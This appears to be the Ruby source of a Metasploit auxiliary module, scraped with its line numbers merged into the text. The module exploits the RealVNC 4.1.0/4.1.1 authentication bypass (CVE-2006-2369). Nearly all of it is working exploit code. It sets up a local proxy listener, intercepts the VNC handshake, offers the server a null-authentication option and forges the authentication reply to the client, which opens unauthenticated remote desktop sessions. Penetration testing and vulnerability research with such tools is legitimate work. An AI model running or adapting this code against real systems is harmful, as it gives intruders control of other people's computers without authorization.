Path: blob/master/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp78def initialize(info = {})9super(10update_info(11info,12'Name' => 'RealVNC NULL Authentication Mode Bypass',13'Description' => %q{14This module exploits an Authentication bypass vulnerability15in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy16listener on LPORT and proxies to the target server.1718The AUTOVNC option requires that vncviewer be installed on19the attacking machine.20},21'Author' => [22'hdm', # original msf2 module23'theLightCosine'24],25'License' => MSF_LICENSE,26'References' => [27['BID', '17978'],28['OSVDB', '25479'],29['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],30['CVE', '2006-2369'],31],32'DisclosureDate' => '2006-05-15',33'Notes' => {34'Stability' => [CRASH_SAFE],35'SideEffects' => [IOC_IN_LOGS],36'Reliability' => []37}38)39)4041register_options(42[43OptPort.new('RPORT', [true, 'The port the target VNC Server is listening on', 5900 ]),44OptPort.new('LPORT', [true, 'The port the local VNC Proxy should listen on', 5900 ]),45OptBool.new('AUTOVNC', [true, 'Automatically launch vncviewer from this host', false])46]47)48end4950def run51# starts up the Listener Server52print_status('Starting listener...')53listener = Rex::Socket::TcpServer.create(54'LocalHost' => '0.0.0.0',55'LocalPort' => datastore['LPORT'],56'Context' => { 'Msf' => framework, 'MsfExploit' => self }57)5859# If the autovnc option is set to true this will spawn a vncviewer on the local machine60# targeting the proxy listener.61if datastore['AUTOVNC']62unless check_vncviewer63print_error('The vncviewer does not appear to be installed, exiting...')64return nil65end66print_status('Spawning viewer thread...')67view = framework.threads.spawn('VncViewerWrapper', false) do68system("vncviewer 127.0.0.1::#{datastore['LPORT']}")69end70end7172# Establishes the connection between the viewier and the remote server73client = listener.accept74add_socket(client)7576# Closes the listener socket as it is no longer needed77listener.close7879s = connect8081serverhello = s.get_once82unless serverhello.include? 'RFB 003.008'83print_error('The server is not vulnerable')84return85end8687# MitM attack on the VNC Authentication Process88client.puts(serverhello)89clienthello = client.get_once90s.puts(clienthello)9192s.read(2)9394print_status('Auth methods received. Sending null authentication option to client')95client.write("\x01\x01")96client.read(1)97s.put("\x01")98s.read(4)99client.put("\x00\x00\x00\x00")100101# Handles remaining proxy operations between the two sockets102closed = false103while (closed == false)104sockets = []105sockets << client106sockets << s107selected = select(sockets, nil, nil, 0)108# print_status ("Selected: #{selected.inspect}")109next if selected.nil?110111if selected[0].include?(client)112begin113data = client.get_once114if data.nil?115print_error('Client closed connection')116closed = true117else118s.put(data)119end120rescue StandardError121print_error('Client closed connection')122closed = true123end124end125126next unless selected[0].include?(s)127128begin129data = s.get_once130if data.nil?131print_error('Server closed connection')132closed = true133else134client.put(data)135end136rescue StandardError137closed = true138end139end140141# Close sockets142s.close143client.close144145if datastore['AUTOVNC']146begin147view.kill148rescue StandardError149nil150end151end152end153154def check_vncviewer155vnc =156Rex::FileUtils.find_full_path('vncviewer') ||157Rex::FileUtils.find_full_path('vncviewer.exe')158if vnc159return true160else161return false162end163end164end165166167